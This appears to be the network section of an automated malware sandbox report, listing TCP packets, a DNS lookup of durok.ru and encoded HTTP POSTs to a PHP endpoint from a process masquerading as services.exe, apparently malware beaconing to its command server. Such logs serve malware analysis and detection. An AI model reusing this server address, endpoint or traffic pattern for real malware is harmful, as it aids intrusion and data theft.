                                                                                                                              Dec 26, 2024 17:18:55.569037914 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.614797115 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:55.711705923 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.758420944 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:55.821434021 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.830194950 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:55.830271006 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:55.950078011 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.950385094 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.950488091 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.163384914 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.165584087 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.285238028 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.285270929 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.285314083 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.569264889 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.649712086 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.689757109 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.689843893 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.690002918 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.692929029 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.766957998 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.766999006 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.809533119 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.886814117 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.886969090 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.887049913 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:56.887198925 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:56.887264967 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:57.009643078 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.036798000 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:57.156459093 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.156547070 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.240035057 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:57.359765053 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.359775066 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.359782934 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.867057085 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:57.974216938 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.067847013 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.115392923 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.146224976 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.325517893 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.380440950 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.380443096 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.440989971 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.440990925 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.443388939 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.561167002 CET8049960104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.561650991 CET8049961104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.561744928 CET4996080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.561749935 CET4996180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.562952042 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.563047886 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.563220024 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.682703018 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.867372990 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.911910057 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.986928940 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:58.986994028 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:58.987138987 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:59.031615019 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.031627893 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.031636953 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.106921911 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.333756924 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:59.453500986 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.453542948 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.740767002 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:59.841703892 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.235456944 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.235542059 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.235574961 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.238207102 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.286705971 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.363387108 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.363389969 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.417484045 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.459163904 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.482952118 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.483072042 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.483310938 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.483359098 CET8049966104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.483573914 CET4996680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.604106903 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.833734035 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:00.953378916 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.953434944 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:00.953483105 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.115629911 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.116643906 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.235430002 CET8049968104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.235477924 CET4996880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.236176968 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.236257076 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.236841917 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.356352091 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.588527918 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.661772966 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.708678007 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:01.709075928 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.709132910 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.913671017 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:01.965584040 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.375240088 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.375958920 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.417151928 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.458570004 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495166063 CET8049971104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.495223999 CET4997180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495502949 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.495560884 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.495732069 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.615302086 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.697639942 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.739819050 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.849327087 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:02.969027996 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.969039917 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:02.969049931 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.365837097 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.366646051 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486402035 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.486505985 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486768007 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486841917 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.486895084 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.606385946 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.672945023 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.833610058 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.833729029 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.925323009 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.953315973 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.953444004 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.061783075 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.078461885 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.184561968 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.184753895 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.199285030 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.199397087 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.199542999 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.319013119 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.552719116 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.664607048 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672435045 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672444105 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672475100 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.833576918 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.917418003 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.146074057 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:05.377367973 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.432230949 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:05.673398972 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.826234102 CET4998380192.168.2.4104.21.93.162

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 26, 2024 17:17:10.278554916 CET5186253192.168.2.41.1.1.1
                                                                                                                              Dec 26, 2024 17:17:10.650877953 CET53518621.1.1.1192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 26, 2024 17:17:10.278554916 CET192.168.2.41.1.1.10x52aaStandard query (0)durok.ruA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 26, 2024 17:17:10.650877953 CET1.1.1.1192.168.2.40x52aaNo error (0)durok.ru104.21.93.162A (IP address)IN (0x0001)false
                                                                                                                              Dec 26, 2024 17:17:10.650877953 CET1.1.1.1192.168.2.40x52aaNo error (0)durok.ru172.67.212.19A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • durok.ru

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449730104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:10.795922995 CET330OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 344
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:11.175096989 CET344OUTData Raw: 00 0a 04 01 06 0a 04 01 05 06 02 01 02 03 01 00 00 0a 05 01 02 06 03 09 02 03 0d 03 04 0e 03 50 0e 00 03 0e 03 54 07 00 0e 04 06 06 07 04 07 04 06 0b 0e 5b 0d 0f 04 0a 05 05 04 54 05 0b 04 0b 02 07 0c 08 04 03 05 00 0d 57 0b 05 0e 54 0c 56 05 07
                                                                                                                              Data Ascii: PT[TWTVVWRQ\L}S~svwmvt@|ewR`l{RRZo`TT`AtwhNu~V@xC\}\u
                                                                                                                              Dec 26, 2024 17:17:11.952718019 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:12.211527109 CET1236INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1GkDfxkTe4SGGOLB5RPLeJHY7d57NnKjuCzYSx6agSced%2FtJgG88xZrfacSnt%2FGPB%2BzXdSXA6js0XbDNrun7myMa3G31%2Fn6p2hGvZ5rCJJtVqW8Mfm2TJSOOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826130ac3542cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3035&min_rtt=1581&rtt_var=3502&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=110438&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 35 32 38 0d 0a 56 4a 7e 05 6f 7e 6b 06 7b 5c 67 5d 68 58 74 59 6a 49 51 08 68 5e 71 0c 6d 4d 60 04 7d 61 60 04 77 70 65 4f 7a 72 79 49 61 5f 68 03 69 71 78 01 55 4b 71 42 77 4c 59 06 7d 61 69 04 7f 74 69 51 6f 58 6c 0d 7c 60 6b 04 75 04 62 5c 77 5f 69 47 7f 61 7e 46 7e 6c 7f 52 7e 77 7f 07 77 66 7b 06 7c 5b 75 48 7c 70 6e 5e 6c 67 5e 4d 79 67 55 5d 78 54 77 03 6d 5c 70 03 6f 70 66 07 68 59 68 01 78 59 56 07 7e 62 73 40 75 62 7f 59 7a 51 41 5b 7c 77 5a 0a 68 71 61 0d 77 6c 6f 5c 6f 55 63 5c 63 70 62 0c 6e 71 5c 58 6a 55 7e 05 7b 72 62 04 76 4d 67 49 61 4f 67 5a 60 62 6e 50 7e 5d 79 5f 60 62 6d 01 76 66 74 09 6b 7c 66 59 77 7c 70 04 68 5d 6c 00 78 6f 63 03 6c 59 76 4b 7c 6e 70 08 77 77 6c 07 69 61 7e 09 7d 6d 67 08 7b 7d 5f 5d 69 5c 58 5c 7b 5d 46 51 7c 6c 74 4e 69 5e 5a 0d 7c 77 75 5e 78 7d 5e 5a 79 71 74 04 7f 4f 78 5f 69 67 55 41 7f 60 5b 40 79 05 68 4f 6a 5b 67 5c 76 73 61 51 7b 5c 79 00 76 66 68 03 7e 58 60 03 7d 76 5b 41 74 72 7f 03 7c 72 5b 42 7c 77 7a 40 78 66 68 41 7e 73 67 49 76 72 71 4f 77 [TRUNCATED]
                                                                                                                              Data Ascii: 528VJ~o~k{\g]hXtYjIQh^qmM`}a`wpeOzryIa_hiqxUKqBwLY}aitiQoXl|`kub\w_iGa~F~lR~wwf{|[uH|pn^lg^MygU]xTwm\popfhYhxYV~bs@ubYzQA[|wZhqawlo\oUc\cpbnq\XjU~{rbvMgIaOgZ`bnP~]y_`bmvftk|fYw|ph]lxoclYvK|npwwlia~}mg{}_]i\X\{]FQ|ltNi^Z|wu^x}^ZyqtOx_igUA`[@yhOj[g\vsaQ{\yvfh~X`}v[Atr|r[B|wz@xfhA~sgIvrqOwaaH|af}BpCgYuqsI{\_G}^uD{Y`ywRxCQFyrlH{MP`^xIV}rQwaV}|w}gpB__Cu|xN{ltw`fz_W~|XzaXHwsuOxta\N|^~
                                                                                                                              Dec 26, 2024 17:17:12.211620092 CET880INData Raw: 4f 77 5c 6d 00 77 65 74 08 7f 42 7d 4f 77 52 74 04 7f 73 5a 01 78 6c 67 4b 78 4e 66 49 7f 43 60 0a 76 77 7c 4f 7e 5c 6e 41 7c 7d 51 09 78 43 72 41 7d 5c 57 04 7d 60 70 08 7f 42 74 41 7d 60 64 08 7d 59 66 01 78 6d 55 4a 7b 72 64 00 7f 5f 55 44 7e
                                                                                                                              Data Ascii: Ow\mwetB}OwRtsZxlgKxNfIC`vw|O~\nA|}QxCrA}\W}`pBtA}`d}YfxmUJ{rd_UD~g{B`W@zcZM~LRw]e@y_WvH`E}vd}XyAtrs}ry}gXAxfZO~Mvr_tam~qTI}|l}wcv_Hxbm~^[IxIZ{glMxmYxr^{]TO{]NZx`D}Ld[ulioJtcTk_mvlA{|pKcp\NyfZiv_z\yv
                                                                                                                              Dec 26, 2024 17:17:12.255414963 CET306OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 384
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:12.588042021 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:12.590327024 CET384OUTData Raw: 5c 5a 5e 5c 54 54 5c 51 5e 58 52 54 56 50 58 5b 54 50 5b 59 56 52 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z^\TT\Q^XRTVPX[TP[YVRS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\(1#?9="T$Z,U=)3#]48#Z.9* @?V3>5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:13.083152056 CET947INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2PP1X7Lg6E7GcIvzohvXC0s2T%2F3zXXT2RRbzHgrILSeQwx4y50b7hLKmMbgHktrnF0jGT6kckuR3He1oqaiDRFCG8M2Sl%2BcbTaRhtXBPsoqcVFIO94cG2Qipw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826134a98742cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4824&min_rtt=1572&rtt_var=6154&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2166&recv_bytes=1364&delivery_rate=2660996&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 05 3e 17 30 0a 37 05 24 54 28 2e 25 0a 2a 1f 00 04 28 22 31 15 2b 11 2a 56 28 28 0e 0e 21 2a 07 01 3d 2a 24 10 25 18 36 11 25 21 2e 5c 05 1d 27 19 3f 38 23 06 26 32 22 07 3e 2d 25 1f 3d 3d 35 5c 25 2f 3f 12 23 02 3e 15 37 21 28 59 2c 02 09 02 2e 2f 30 12 2b 56 39 05 22 3d 21 51 0c 1f 38 52 35 00 3b 11 25 3e 00 0f 21 1e 15 51 26 2b 3a 1d 36 3b 06 08 33 3a 28 03 26 55 3f 1d 23 2e 33 55 3f 3d 2e 5e 32 11 25 5c 3e 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'>07$T(.%*("1+*V((!*=*$%6%!.\'?8#&2">-%==5\%/?#>7!(Y,./0+V9"=!Q8R5;%>!Q&+:6;3:(&U?#.3U?=.^2%\>)%^-#T>TV0
                                                                                                                              Dec 26, 2024 17:17:13.106422901 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 1916
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:13.439193964 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:13.441595078 CET1916OUTData Raw: 59 5d 5e 58 51 5e 59 55 5e 58 52 54 56 50 58 54 54 5d 5b 5c 56 51 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^XQ^YU^XRTVPXTT][\VQS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<1#+"8..?7"['#]#,+#<Z,*?'*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:13.934827089 CET951INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qPAncYrbeU%2B2TqMWJvp30Uq3RSTBtXtTdqarzfyRNGnIs2gZ7n38Vg4sxQGycfyOest3FL9tWKmW859OGWYJEUKczK%2FuLFct9dImmmwMw9jDhtdnLh%2F20NaYew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826139f9bf42cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5306&min_rtt=1572&rtt_var=5817&sent=12&recv=14&lost=0&retrans=0&sent_bytes=3138&recv_bytes=3587&delivery_rate=2660996&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 02 2a 17 09 51 37 2c 0a 1d 2a 3d 07 0a 3d 32 3d 15 3c 31 39 5c 3f 59 3e 55 28 28 3f 52 20 04 36 5a 29 04 02 5a 27 26 04 59 25 1b 2e 5c 05 1d 27 5e 3e 28 3f 00 27 0b 21 11 3e 00 3a 08 29 07 21 5e 25 2c 20 03 23 2b 36 5d 37 32 3c 5b 38 3c 0d 03 3a 05 37 00 3c 30 2d 05 21 07 21 51 0c 1f 38 56 22 29 27 58 31 58 2a 0a 20 30 3f 56 27 3b 3a 53 22 3b 0d 1d 26 3a 0d 1e 27 23 20 0f 23 3e 2c 0c 3f 3d 00 59 25 01 00 03 2a 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*Q7,*==2=<19\?Y>U((?R 6Z)Z'&Y%.\'^>(?'!>:)!^%, #+6]72<[8<:7<0-!!Q8V")'X1X* 0?V';:S";&:'# #>,?=Y%*)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449731104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
